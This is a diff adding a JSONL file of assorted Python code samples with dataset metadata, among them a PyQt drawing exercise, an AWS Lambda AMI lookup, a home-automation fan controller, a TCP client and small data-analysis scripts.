diff --git "a/4037.jsonl" "b/4037.jsonl" new file mode 100644--- /dev/null +++ "b/4037.jsonl" @@ -0,0 +1,761 @@ +{"seq_id":"290065905","text":"import sys\r\nfrom PyQt5.QtGui import QPainter, QPen, QBrush\r\nfrom PyQt5.QtWidgets import QWidget, QApplication\r\nfrom PyQt5.QtCore import Qt, QRect\r\n\r\nclass Olympic(QWidget):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n # initialize additional attributes as needed here.\r\n self.setGeometry(300, 300, 550, 600)\r\n self.setWindowTitle('Olympic Rings')\r\n self.__yellowblue = False\r\n self.__yellowblack = False\r\n self.__greenblack = False\r\n self.__greenred = False\r\n self.__blue = False\r\n self.__yellow = False\r\n self.__black = False\r\n self.__green = False\r\n self.__red = False\r\n self.__Rect = QRect(230,80,140,50)\r\n self.__half1 = QRect(230,80,70,50)\r\n self.__half2 = QRect(300,80,70,50)\r\n self.show() # this should be the last line of your constructor.\r\n \r\n def inCirc(self,a,b,x,y):\r\n return ((((a - x)**2) + (b - y)**2)**(1/2) < 60)\r\n \r\n def mousePressEvent(self, event):\r\n if(self.inCirc(160,300,event.x(),event.y())) and (self.inCirc(230,370,event.x(),event.y())):\r\n self.__yellowblue = True\r\n elif(self.inCirc(300,300,event.x(),event.y())) and (self.inCirc(230,370,event.x(),event.y())):\r\n self.__yellowblack = True\r\n elif(self.inCirc(370,370,event.x(),event.y())) and (self.inCirc(300,300,event.x(),event.y())):\r\n self.__greenblack = True\r\n elif(self.inCirc(370,370,event.x(),event.y())) and (self.inCirc(450,310,event.x(),event.y())):\r\n self.__greenred = True\r\n elif(self.inCirc(160,300,event.x(),event.y())):\r\n self.__blue = True\r\n elif(self.inCirc(240,380,event.x(),event.y())):\r\n self.__yellow = True\r\n elif(self.inCirc(300,300,event.x(),event.y())):\r\n self.__black = True\r\n elif(self.inCirc(370,370,event.x(),event.y())):\r\n self.__green = True\r\n elif(self.inCirc(450,310,event.x(),event.y())):\r\n self.__red = True\r\n self.update()\r\n \r\n def paintEvent(self, event):\r\n qp = QPainter()\r\n qp.begin(self)\r\n # draw things here\r\n blackPen = QPen(QBrush(Qt.black),8)\r\n bluePen = QPen(QBrush(Qt.blue),8)\r\n redPen = QPen(QBrush(Qt.red),8)\r\n yellowPen = QPen(QBrush(Qt.yellow),8)\r\n greenPen = QPen(QBrush(Qt.green),8)\r\n qp.setPen(blackPen)\r\n qp.drawEllipse(240,240,120,120)\r\n qp.setPen(bluePen)\r\n qp.drawEllipse(100,240,120,120)\r\n qp.setPen(redPen)\r\n qp.drawEllipse(380,240,120,120)\r\n qp.setPen(yellowPen)\r\n qp.drawEllipse(170,310,120,120)\r\n qp.setPen(greenPen)\r\n qp.drawEllipse(310,310,120,120)\r\n if(self.__yellowblue):\r\n qp.fillRect(self.__half1,QBrush(Qt.blue))\r\n qp.fillRect(self.__half2,QBrush(Qt.yellow))\r\n self.__yellowblue = False\r\n elif(self.__yellowblack):\r\n qp.fillRect(self.__half1,QBrush(Qt.yellow))\r\n qp.fillRect(self.__half2,QBrush(Qt.black))\r\n self.__yellowblack = False\r\n elif(self.__greenblack):\r\n qp.fillRect(self.__half1,QBrush(Qt.black))\r\n qp.fillRect(self.__half2,QBrush(Qt.green))\r\n self.__greenblack = False\r\n elif(self.__greenred):\r\n qp.fillRect(self.__half1,QBrush(Qt.green))\r\n qp.fillRect(self.__half2,QBrush(Qt.red))\r\n self.__greenred = False\r\n elif(self.__blue):\r\n qp.fillRect(self.__Rect,QBrush(Qt.blue))\r\n self.__blue = False\r\n elif(self.__yellow):\r\n qp.fillRect(self.__Rect,QBrush(Qt.yellow))\r\n self.__yellow = False\r\n elif(self.__black):\r\n qp.fillRect(self.__Rect,QBrush(Qt.black))\r\n self.__black = False\r\n elif(self.__green):\r\n qp.fillRect(self.__Rect,QBrush(Qt.green))\r\n self.__green = False\r\n elif(self.__red):\r\n qp.fillRect(self.__Rect,QBrush(Qt.red))\r\n self.__red = False\r\n else:\r\n qp.eraseRect(self.__Rect)\r\n qp.setPen(bluePen)\r\n qp.drawArc(100,240,120,120,-230,100)\r\n qp.setPen(blackPen)\r\n qp.drawArc(240,240,120,120,-240,100)\r\n qp.drawArc(240,240,120,120,-1680,100)\r\n qp.setPen(redPen)\r\n qp.drawArc(380,240,120,120,-1650,100)\r\n qp.end()\r\n\r\n# DO NOT MODIFY BELOW THIS LINE\r\nif __name__ == '__main__': \r\n app = QApplication(sys.argv)\r\n ex = Olympic()\r\n sys.exit(app.exec_())","sub_path":"project3/Olympic.py","file_name":"Olympic.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"495550622","text":"##python2\nimport os\nimport sys\nimport boto3\nimport json\nimport threading\nimport logging\nimport urllib3\n#from functools import cmp_to_key\n\nCFN_SUCCESS = \"SUCCESS\"\nCFN_FAILED = \"FAILED\"\n\nclass my_version(str):\n def __init__(self, str_version):\n version = str_version.split('.')\n self.major = self.minor = self.patch = 0\n if len(version) >= 1:\n self.major = int(version[0])\n if len(version) >= 2:\n self.minor = int(version[1])\n if len(version) >= 3:\n self.patch = int(version[2])\n\n#input: {'name': 'xx', 'ami_id': 'xx', 'version': 'x.y.z'}\ndef mycmp(x, y):\n xv = my_version(x['version'])\n yv = my_version(y['version'])\n ret = xv.major - yv.major\n if 0 != ret:\n return ret\n ret = xv.minor - yv.minor\n if 0 != ret:\n return ret\n ret = xv.patch - yv.patch\n return ret\n\ndef find_amis(filters):\n client = boto3.client('ec2')\n #resp = client.describe_images(Owners=['aws-marketplace'], Filters=filters)\n resp = client.describe_images(Filters=filters)\n all_images = resp['Images']\n ret_list = []\n for image in all_images:\n ret_list.append({'name':image['Name'], 'ami_id': image['ImageId']})\n return ret_list\n\ndef find_custom_ami(ami_name):\n filters = []\n filters.append({'Name': 'name', 'Values': [ami_name]})\n image_list = find_amis(filters)\n if len(image_list) <= 0:\n msg = 'Can not found custom AMI! ami_name: %s' % (ami_name)\n raise Exception(msg)\n image = image_list[0]\n image['version'] = 'x.x.x'\n return image\n\ndef find_latest(pay_type, ami_name=None):\n if None != ami_name:\n return find_custom_ami(ami_name)\n filters = []\n filters.append({'Name': 'owner-alias', 'Values': ['aws-marketplace']})\n filters.append({'Name': 'is-public', 'Values': ['true']})\n filters.append({'Name': 'name', 'Values': ['*FortiWeb-AWS-*%s*' % (pay_type)]})\n image_list = find_amis(filters)\n if len(image_list) <= 0:\n msg = 'Can not found latest AMI! type: %s' % pay_type\n raise Exception(msg)\n for image in image_list:\n version = image['name'].split('FortiWeb-AWS-')[1].split(pay_type)[0]\n image['version'] = version\n #image_list.sort(key=cmp_to_key(mycmp))\n image_list.sort(mycmp)\n print('pay_type(%s) ami list: %s' % (pay_type, image_list))\n return image_list[-1]\n\ndef find_byol_latest(byol_ami_name=None):\n return find_latest('_BYOL', byol_ami_name)\n\ndef find_on_demand_latest(on_demand_ami_name=None):\n return find_latest('_OnDemand', on_demand_ami_name)\n\ndef cfn_send(evt, context, responseStatus, respData, reason=''):\n respUrl = evt['ResponseURL']\n print(respUrl)\n respBody = {}\n respBody['Status'] = responseStatus\n respBody['Reason'] = reason + '\\nSee the details in CloudWatch:' + context.log_group_name + ',' + context.log_stream_name\n respBody['PhysicalResourceId'] = context.log_stream_name\n respBody['StackId'] = evt['StackId']\n respBody['RequestId'] = evt['RequestId']\n respBody['LogicalResourceId'] = evt['LogicalResourceId']\n respBody['NoEcho'] = None\n respBody['Data'] = respData\n\n json_respBody = json.dumps(respBody)\n print(\"Response to cloudformation:\\n\" + json_respBody)\n headers = {'content-type' : '', 'content-length' : str(len(json_respBody)) }\n try:\n http = urllib3.PoolManager()\n response = http.request('PUT', respUrl, headers=headers, body=json_respBody)\n print(\"cloudformation status code: %s\" % (response.status))\n print(\"cloudformation return body: %s\" %(response.data.decode('utf-8')))\n except Exception as e:\n print(\"send(..) failed sending response: \" + str(e))\n raise\n\ndef timeout(event, context):\n logging.error('Time out, failure response to CloudFormation')\n cfn_send(event, context, CFN_FAILED, {}, 'fwb labmda timeout')\n\ndef handler(event, context):\n print('event: %s' % json.dumps(event))\n status = CFN_SUCCESS\n respData = {}\n err_msg = 'no error'\n if event['RequestType'] not in ['Create', 'Update']:\n cfn_send(event, context, status, respData, err_msg)\n return\n # make sure we send a failure to CloudFormation if the function is going to timeout\n timer = threading.Timer((context.get_remaining_time_in_millis() / 1000.00) - 0.5, timeout, args=[event, context])\n timer.start()\n rpt = event['ResourceProperties']\n byol_needed = True\n on_demand_needed = True\n byol_ami_name = None\n on_demand_ami_name = None\n if 'BYOLNeeded' in rpt and rpt['BYOLNeeded'].strip().startswith('n'):\n byol_needed = False\n if 'OnDemandNeeded' in rpt and rpt['OnDemandNeeded'].strip().startswith('n'):\n on_demand_needed = False\n if 'BYOLAMIName' in rpt and len(rpt['BYOLAMIName'].lstrip().rstrip()) > 0:\n byol_ami_name = rpt['BYOLAMIName']\n if 'OnDemandAMIName' in rpt and len(rpt['OnDemandAMIName'].lstrip().rstrip()) > 0:\n on_demand_ami_name = rpt['OnDemandAMIName']\n try:\n print('try to find ami id')\n if True == byol_needed:\n print('BYOL needed')\n image_info = find_byol_latest(byol_ami_name)\n respData['LatestBYOLAmiId'] = image_info['ami_id']\n respData['LatestBYOLAmiVersion'] = image_info['version']\n else:\n print('BYOL not needed')\n respData['LatestBYOLAmiId'] = 'i-not-required'\n respData['LatestBYOLAmiVersion'] = '0.0.0'\n if True == on_demand_needed:\n print('OnDemand needed')\n image_info = find_on_demand_latest(on_demand_ami_name)\n respData['LatestOnDemandAmiId'] = image_info['ami_id']\n respData['LatestOnDemandAmiVersion'] = image_info['version']\n else:\n print('OnDemand not needed')\n respData['LatestOnDemandAmiId'] = 'i-not-required'\n respData['LatestOnDemandAmiVersion'] = '0.0.0'\n except Exception as e:\n err_msg = 'exception: %s' % (str(e))\n status = CFN_FAILED\n finally:\n timer.cancel()\n cfn_send(event, context, status, respData, err_msg)\n\nif '__main__' == __name__:\n event = {}\n class fake_context: pass\n fake_context.get_remaining_time_in_millis = lambda self: 2*60*1000\n event['RequestType'] = 'Create'\n event['ResponseURL'] = 'http://127.0.0.1:3000'\n event['StackId'] = 'StackId'\n event['RequestId'] = 'RequestId'\n event['LogicalResourceId'] = 'LogicalResourceId'\n event['ResourceProperties'] = {}\n event['ResourceProperties']['BYOLAMIName'] = ''\n event['ResourceProperties']['OnDemandAMIName'] = ''\n #event['ResourceProperties']['BYOLNeeded'] = 'n'\n event['ResourceProperties']['BYOLNeeded'] = 'y'\n #event['ResourceProperties']['OnDemandNeeded'] = 'n'\n event['ResourceProperties']['OnDemandNeeded'] = 'y'\n context = fake_context()\n context.log_group_name = 'log_group'\n context.log_stream_name = 'log_stream'\n handler(event, context)\n\n","sub_path":"aws/lambda/find_ami.py","file_name":"find_ami.py","file_ext":"py","file_size_in_byte":6972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418467949","text":"\n\n#\n# Airscape API Doc: https://blog.airscapefans.com/archives/gen-2-controls-api\n#\n# TODO:\n# - Nothing\n#\nimport polyinterface\nimport time\nfrom pgSession import pgSession\n\nLOGGER = polyinterface.LOGGER\n\nclass Airscape2(polyinterface.Node):\n\n def __init__(self, controller, primary, address, name, config_data):\n super(Airscape2, self).__init__(controller, primary, address, name)\n self.config_data = config_data\n self.debug_level = 1\n self.do_poll = False # Don't let shortPoll happen during initialiation\n self.watching_door = False\n self.status = {}\n self.driver = {}\n\n def start(self):\n self.setDriver('GV1', 0)\n self.l_info('start', 'config={}'.format(self.config_data))\n self.host = self.config_data['host']\n self.session = pgSession(self,self.name,LOGGER,self.host,debug_level=self.debug_level)\n self.query()\n self.do_poll = True\n\n def shortPoll(self):\n self.l_debug('shortPoll', '...')\n if not self.watching_door:\n self.poll()\n\n def longPoll(self):\n pass\n\n def poll(self):\n res = self.session.get('status.json.cgi',{},parse=\"json\")\n self.set_from_response(res)\n\n def wait_for_response(self):\n # Poll until we have a status\n while not (self.st):\n self.l_debug(\"wait_for_response\",\"\")\n self.poll()\n time.sleep(1)\n\n # XREF from airscape to drivers\n all_dinfo = {\n 'fanspd': 'ST',\n 'attic_temp': 'CLITEMP',\n 'timeremaining': 'TIMEREM',\n 'power': 'CPW',\n 'doorinprocess': 'GV2',\n 'cfm': 'GV3',\n 'house_temp': 'GV4',\n 'oa_temp': 'GV5',\n 'interlock1': 'GV6',\n 'interlock2': 'GV7'\n }\n # xref from setfanspd to status.cgi. Why are the different???\n all_xref = {\n 'attic': 'attic_temp',\n 'inside': 'house_temp',\n 'oa': 'oa_temp'\n }\n def set_from_response(self,res):\n self.l_debug('set_from_response',\"In: {}\".format(res))\n self.st = self.check_response(res)\n self.setDriver('GV1',1 if self.st else 0)\n if self.st:\n rdata = res['data']\n for key, value in self.all_xref.items():\n if key in rdata:\n rdata[value] = rdata[key]\n for key, driver in self.all_dinfo.items():\n if key in rdata:\n self.status[key] = rdata[key]\n if key == 'fanspd':\n dval = int(rdata[key]) * 10 # *10 if zwave and 1 if Insteon\n else:\n dval = rdata[key]\n self.setDriver(driver,dval)\n # Wait for the door if we are not watching it already\n if not self.watching_door:\n self.watch_door()\n self.l_debug('set_from_response',\"Out: {}\".format(self.status))\n\n def check_response(self,res):\n if res is not False and 'code' in res and res['code'] == 200:\n if 'data' in res and res['data'] is not False:\n return True\n else:\n self.l_error('check_response', 'Got good code: {}'.format(res))\n return False\n\n def watch_door(self):\n cnt = 0\n while int(self.status['doorinprocess']) == 1:\n if cnt > 60:\n self.l_error('watch_door', 'Timeout waiting for door to open?')\n break\n self.watching_door = True\n self.l_debug('watch_door', 'st={}'.format(self.status['doorinprocess']))\n time.sleep(1)\n cnt += 1\n self.poll()\n self.watching_door = False\n self.l_debug('watch_door', 'st={}'.format(self.status['doorinprocess']))\n\n def query(self):\n self.poll()\n self.reportDrivers()\n\n def setDriver(self,driver,value):\n self.driver[driver] = value\n super(Airscape2, self).setDriver(driver,value)\n\n def getDriver(self,driver):\n if driver in self.driver:\n return self.driver[driver]\n else:\n return super(Airscape2, self).getDriver(driver)\n\n def setOnI(self, command):\n val = command.get('value')\n self.l_info('setOn','val={}'.format(val))\n if val is None:\n speed = 5 # Medium\n else:\n val = int(val)\n if val == 0:\n self.setOff({})\n return\n elif val == 255:\n # Insteon High\n speed = 10\n elif val == 253:\n # Inston Medium\n speed = 5\n elif val == 127:\n # Insteon Medium\n speed = 3\n elif val > 10:\n self.l_error('setOn','Illegal value {}'.format(val))\n return\n self.setSpeed(speed)\n\n def setOnZW(self, command):\n val = command.get('value')\n self.l_info('setOn','val={}'.format(val))\n if val is None:\n speed = 4\n else:\n val = int(val)\n if val == 0:\n self.setOff({})\n return\n elif val > 90:\n # High\n speed = 10\n elif val > 80:\n # MediumHigh\n speed = 9\n elif val > 80:\n # Medium\n speed = 8\n elif val > 60:\n # Medium\n speed = 7\n elif val > 50:\n # Medium\n speed = 6\n elif val > 40:\n # Medium\n speed = 5\n elif val > 30:\n # Medium\n speed = 4\n elif val > 20:\n # Medium\n speed = 3\n elif val > 10:\n # Medium\n speed = 2\n elif val > 0:\n # Low\n speed = 1\n self.setSpeed(speed)\n\n def setOff(self, command):\n self.l_info('setOff','')\n # The data returned by fanspd is not good xml\n res = self.session.get('fanspd.cgi',{'dir': 4},parse=\"axml\")\n self.set_from_response(res)\n\n def speedDown(self, command):\n self.l_info('speedDown','')\n # The data returned by fanspd is not good xml\n res = self.session.get('fanspd.cgi',{'dir': 3},parse=\"axml\")\n self.set_from_response(res)\n\n def speedUp(self, command):\n self.l_info('speedUp','')\n # The data returned by fanspd is not good xml\n res = self.session.get('fanspd.cgi',{'dir': 1},parse=\"axml\")\n self.set_from_response(res)\n\n def addHour(self, command):\n # The data returned by fanspd is not good xml\n res = self.session.get('fanspd.cgi',{'dir': 2},parse=\"axml\")\n self.set_from_response(res)\n\n def setSpeed(self,val):\n self.l_info('setSpeed','{}'.format(val))\n if not self.do_poll:\n self.l_debug('setSpeed', 'waiting for startup to complete')\n while not self.do_poll:\n time.sleep(1)\n if val == 0:\n self.setOff('')\n else:\n self.wait_for_response()\n if 'fanspd' in self.status:\n while val > int(self.status['fanspd']):\n self.l_info(\"_setSpeed\",\"current={} request={}\".format(int(self.status['fanspd']),val))\n self.speedUp({})\n time.sleep(1)\n while val < int(self.status['fanspd']):\n self.l_info(\"_setSpeed\",\"current={} request={}\".format(int(self.status['fanspd']),val))\n self.speedDown({})\n time.sleep(1)\n self.l_info(\"_setSpeed\",\"current={} request={}\".format(int(self.status['fanspd']),val))\n else:\n self.l_error('setSpeed', 'Called before we know the current fanspd, that should not be possible')\n\n def l_info(self, name, string):\n LOGGER.info(\"%s:%s:%s: %s\" % (self.id,self.name,name,string))\n\n def l_error(self, name, string):\n LOGGER.error(\"%s:%s:%s: %s\" % (self.id,self.name,name,string))\n\n def l_warning(self, name, string):\n LOGGER.warning(\"%s:%s:%s: %s\" % (self.id,self.name,name,string))\n\n def l_debug(self, name, string):\n LOGGER.debug(\"%s:%s:%s: %s\" % (self.id,self.name,name,string))\n\n drivers = [\n {'driver': 'ST', 'value': 0, 'uom': 25}, # speed\n {'driver': 'CLITEMP', 'value': 0, 'uom': 17}, # attic_temp\n {'driver': 'TIMEREM', 'value': 0, 'uom': 56}, # minutes\n {'driver': 'CPW', 'value': 0, 'uom': 73}, # watt?\n {'driver': 'GV1', 'value': 0, 'uom': 2}, # Online\n {'driver': 'GV2', 'value': 0, 'uom': 2}, # doorinprocess\n {'driver': 'GV3', 'value': 0, 'uom': 7}, # cfm\n {'driver': 'GV4', 'value': 0, 'uom': 17}, # house_temp\n {'driver': 'GV5', 'value': 0, 'uom': 17}, # oa_temp\n {'driver': 'GV6', 'value': 0, 'uom': 56}, # interlock1\n {'driver': 'GV7', 'value': 0, 'uom': 56}, # interlock2\n\n ]\n id = 'airscape2_F'\n commands = {\n 'FDUP': speedUp,\n 'FDDOWN': speedDown,\n 'DOF': setOff,\n 'DON' : setOnZW,\n 'ADD_HOUR': addHour,\n }\n \"\"\"\n Used 4.17.x.x because Benoit said this for the portal:\n GH will use these settings to set/read the fan speeds.\n const fanSpeedsDef = {\n // This is for fanlinc (Insteon, type 1.x.x.x)\n 255: [\n {name: 'Off', maxSpeed: 0},\n {name: 'Low', maxSpeed: 127}, // 1% - 49% / Low\n {name: 'Medium', maxSpeed: 253}, // 50% - 99% / Medium\n {name: 'High', maxSpeed: 255}, // 100% / High\n ],\n // This is for fans using ZWave (type 4.16.x.x)\n 100: [\n {name: 'Off', maxSpeed: 0},\n {name: 'Low', maxSpeed: 24}, // 1% - 24% / Low\n {name: 'Medium', maxSpeed: 49}, // 25% - 49% / Medium\n {name: 'MediumHigh', maxSpeed: 74}, // 50% - 74% / Medium-High\n {name: 'High', maxSpeed: 100}, // 75-100% / High\n ],\n };\n Hints See: https://github.com/UniversalDevicesInc/hints\n \"\"\"\n hint = [4,17,9,1]\n","sub_path":"nodes/Airscape2.py","file_name":"Airscape2.py","file_ext":"py","file_size_in_byte":10171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"470280797","text":"from django.core.mail import send_mail\n\n\ndef send_activation_mail(email, activation_code):\n message = f\"\"\"Спасибо за регистрацию активируйте аккаунт по ссылке:\n http://127.0.0.1:8000/accounts/activation/?u={activation_code}\"\"\"\n send_mail(\n 'Активация аккаунта',\n message,\n 'rest@mysite.com',\n [email, ]\n )","sub_path":"account/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"55955622","text":"import numpy as np\n\ndef __corrupt(y, corrupt_indices, threshold):\n for i in corrupt_indices:\n # Corrupt that data with some probability.\n if np.random.uniform() < threshold:\n y[i] = 1 - y[i]\n\n # Return the corrupted response variable.\n return y\n\n\ndef random_corruption(y, gamma, threshold):\n # Calculate number of samples.\n n_samples = len(y)\n \n # Generate corrupt indices.\n corrupt_indices = np.random.choice(n_samples, size = gamma)\n\n # Return the corrupted response variable.\n return __corrupt(y, corrupt_indices, threshold)\n\ndef lowest_log_likelihood_corruption(X, y, beta, gamma, threshold):\n # Calculate number of samples.\n n_samples = len(y)\n\n # Initialize a vector to store the corrupt likelihoods.\n corrupt_likelihood = np.zeros((n_samples, 1)).ravel()\n\n for i in xrange(n_samples):\n # Get this data and corrupt the response.\n X_i, y_i = X[i], 1 - y[i]\n\n # Calculate the log-likelihood for this corrupted term.\n corrupt_likelihood[i] = y_i * (np.dot(beta, X_i)) - np.log(1 + np.exp(np.dot(beta, X_i)))\n\n # Get the indices of the smallest terms.\n corrupt_indices = np.argsort(-corrupt_likelihood)[:gamma]\n\n # Return the corrupted response variable.\n return __corrupt(y, corrupt_indices, threshold)\n","sub_path":"response_variable_corruption.py","file_name":"response_variable_corruption.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"506391903","text":"# %load q06_create_runs_series/build.py\n#Default Imports\nimport pandas as pd\nimport numpy as np\nipl_matches_array =np.genfromtxt('data/ipl_matches_small.csv', dtype='|S50', skip_header=1, delimiter=',')\n\ndef create_runs_series(match_code):\n filter_set = ipl_matches_array[ipl_matches_array[:,0] == match_code]\n delivery = filter_set[:,11]\n runs = filter_set[:,16]\n variable = pd.Series(runs, index = delivery)\n return variable\n#Your Solution\n\ncreate_runs_series(b'392203')\n\n\n\n\n","sub_path":"q06_create_runs_series/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"196132241","text":"# Time Complexity :O(n*2^n) where n is number of candidates\n# Space Complexity : O(n) single temp list\n# Did this code successfully run on Leetcode : yes\n# Any problem you faced while coding this : no\n\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n\n self.result = []\n\n if s == None:\n return self.result\n self.backtrack(s, [], 0)\n return self.result\n\n def backtrack(self, s, temp, index):\n if index == len(s):\n # print('resssssssssssss=')\n self.result.append(list(temp))\n\n for i in range(index, len(s)):\n # print('index=',index)\n # print('i=',i)\n\n if self.isPalindrome(s, index, i):\n # print('resssssssssssss=')\n # add from start that is index to i (may i change every for loop)\n temp.append(s[index:i+1])\n # print('temp=',temp)\n self.backtrack(s, temp, i+1)\n # print('------------------------------------------------------')\n # print('tempbbbbbbbbbbb=',temp)\n # after index reaching the end of s, we pop last element\n # print('indexbbbbbbbbbbbbbbbbbbbb=',index)\n # print('i=',i)\n temp.pop()\n # print('done opop')\n\n def isPalindrome(self, s, left, right):\n if left == right:\n return True\n while left < right:\n if s[left] != s[right]:\n return False\n left += 1\n right -= 1\n\n return True\n","sub_path":"Problem2.py","file_name":"Problem2.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"253090073","text":"# module that provides utilities for connecting to web addresses and\n# retrieving data from them\nimport urllib2\n\n\ndef main():\n # open a connection to a URL using urllib2\n webUrl = urllib2.urlopen(\"http://joemarini.com\")\n\n # get the result and print it\n print\n \"Result code : \" + str(webUrl.getcode())\n\n # read the data from the URL and print it\n data = webUrl.read()\n print\n data\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python_Up_And_Running/04 - Working with web data/01_fetching_web_data.py","file_name":"01_fetching_web_data.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"284574213","text":"import os\nimport click\nimport pandas as pd\nimport os.path as op\nfrom glob import glob\nfrom niedu.global_utils import get_data_dir\n\n\ndef create_fsl_onset_files(data_dir):\n \"\"\" Creates FSL-style onset files (tab-delimited, without headers). \"\"\"\n subs = sorted(glob(op.join(data_dir, 'sub-03')))\n for sub in subs:\n # first flocBLOCKED and flocER files\n flocs = sorted(glob(op.join(sub, 'ses-*', 'func', '*floc*_events.tsv')))\n\n for floc in flocs:\n df = pd.read_csv(floc, sep='\\t')\n conds = np.unique(df['trial_type'])\n for con in conds:\n f_out = floc.replace('_events.tsv', f'_condition-{con}_events.txt')\n #if op.isfile(f_out):\n # continue\n\n tmp = df.query(\"trial_type == @con\").copy()\n tmp.loc[:, 'weight'] = 1\n tmp.loc[:, 'duration'] = tmp.loc[:, 'duration'].round(1)\n tmp = tmp.loc[:, ['onset', 'duration', 'weight']] # reorder\n tmp.to_csv(f_out, header=False, index=False, sep='\\t')\n\n\n@click.command()\n@click.option('--datadir', default=None, help='Directory with data')\n@click.option('--fsldir', default=None, help='FSL directory')\ndef api(datadir, fsldir):\n \n if datadir is None:\n datadir = get_data_dir()\n \n if not os.path.isdir(datadir):\n raise ValueError(f\"Datadir {datadir} does not exist!\")\n\n print(f\"Found {datadir} with data!\")\n create_fsl_onset_files(datadir)\n\n\n\nif __name__ == '__main__':\n api()\n","sub_path":"post_install.py","file_name":"post_install.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"536762318","text":"#!/usr/bin/env python\n\nimport os;\nimport sys;\nfrom socket import *;\nfrom select import select;\nsys.path.append(\"..\");\nfrom common.CodeEngine import CodeEngine;\n\nclass TCPSocket(object):\n\tdef __init__(self, host, port):\n\t\tself.host = host;\n\t\tself.port = port;\n\t\tself.socket_fd = socket(AF_INET, SOCK_STREAM, 0);\n\t\tself.connected = False;\n\t\tself.recv_buffer = '';\n\n\tdef is_connected(self):\n\t\treturn self.connected;\n\n\tdef connect(self):\t\n\t\ttry:\n\t\t\tself.socket_fd.connect((self.host, self.port));\n\t\texcept:# socket.error, e:\n\t\t\tpass;\n\t\telse:\n\t\t\t#print \"connect to server(host: %s, port:%d) success\" % (self.host, self.port);\n\t\t\tself.connected = True;\n\t\treturn self.is_connected();\n\n\tdef disconnect(self):\n\t\tself.socket_fd.close();\n\t\tself.connected = False;\t\n\t\n\tdef send_data(self, bstr):\n\t\tif self.is_connected():\n\t\t\tself.socket_fd.send(bstr);\n\t\t\t#print \"send data(len = %d) sucess\\n\" % len(bstr);\n\n\tdef recv_data(self):\n\t\tif self.is_connected():\n\t\t\trs,ws,es = select([self.socket_fd], [], [], 1);\n\t\t\tif es:\n\t\t\t\tself.disconnect();\n\t\t\t\t#print \"closed by peer\";\n\t\t\tif rs:\n\t\t\t\ttry:\n\t\t\t\t\tdata = self.socket_fd.recv(1024);\n\t\t\t\t\tif data:\n\t\t\t\t\t\t#print \"recv data(%d): %s\" % (len(data), data);\n\t\t\t\t\t\tself.recv_buffer = self.recv_buffer + data;\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.disconnect();\n\t\t\t\t\t\t#print \"closed by peer...\";\n\t\t\t\texcept:\n\t\t\t\t\tself.disconnect();\n\t\n\tdef get_one_package(self):\n\t\tif len(self.recv_buffer) > 4:\n\t\t\tpkg_len = CodeEngine.decode_int32(self.recv_buffer);\n\t\t\t#print \"pkg len : %d, total len : %d\" % (pkg_len, len(self.recv_buffer));\n\t\t\tif pkg_len <= len(self.recv_buffer):\n\t\t\t\tcode = self.recv_buffer[:pkg_len];\n\t\t\t\tself.recv_buffer = self.recv_buffer[pkg_len:];\n\t\t\t\treturn code;\n\t\treturn None;\n\t\t\t\t\n\nif __name__ == '__main__':\n\tts = TCPSocket('10.0.128.203', 20001);\n\tts.connect();\n\ttime.sleep(10);\n\tts.recv_data();\n\tts.recv_data();\n\n","sub_path":"Server/python/service_check/TCPSocket.py","file_name":"TCPSocket.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118388029","text":"#!/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom optparse import OptionParser\nimport pymongo\nimport sys\n\nimport nltk\n\nimport omexp.experiment.reviewquery as reviewquery\nimport six\n\nALL_DOMAINS = ['AMZN_Apparel',\n 'AMZN_Books',\n 'AMZN_Electronics',\n 'AMZN_Music',\n 'Health',\n 'IMDB',\n 'Network',\n 'Pet',\n 'Software',\n 'Tripadvisor',\n 'auto',\n 'baby',\n 'diy',\n 'jewel',\n 'office',\n 'patio',\n 'toys',\n 'finefoods'\n]\n\n\ndef rolling(cur_avg, n, value):\n return ((n - 1.0) * cur_avg + value) / n\n\n\ndef compute(dataset):\n # Execute selected test\n n = 1.0\n sentcnt = 1.0\n ds = {'tokens': 0.0, 'words': 0.0, 'unique': 0.0, 'sentences': 0.0, 'sent_size': 0.0}\n for rec in reviewquery.get_reviews([dataset]):\n ds['words'] = rolling(ds['words'], n, rec['words'])\n ds['unique'] = rolling(ds['unique'], n, rec['unique_words'])\n cur_sent = nltk.sent_tokenize(rec['text'])\n ds['tokens'] = rolling(ds['tokens'], n, len(nltk.word_tokenize(rec['text'])))\n ds['sentences'] = rolling(ds['sentences'], n, len(cur_sent))\n for sent in cur_sent:\n sz = len(nltk.word_tokenize(sent))\n ds['sent_size'] = rolling(ds['sent_size'], sentcnt, sz)\n sentcnt += 1.0\n n += 1.0\n\n ds['docs'] = (n - 1)/2\n return ds\n\n\nif __name__ == '__main__':\n # grab parameters\n mainparser = OptionParser()\n mainparser.add_option('--dataset', action='store', type='string', default=None, dest='dataset',\n help='Dataset to get stats')\n mainparser.add_option('--latex', action='store_true', default=False, dest='latex', help='Output latex columns')\n (options, args) = mainparser.parse_args()\n\n if not options.dataset:\n datasets = ALL_DOMAINS\n 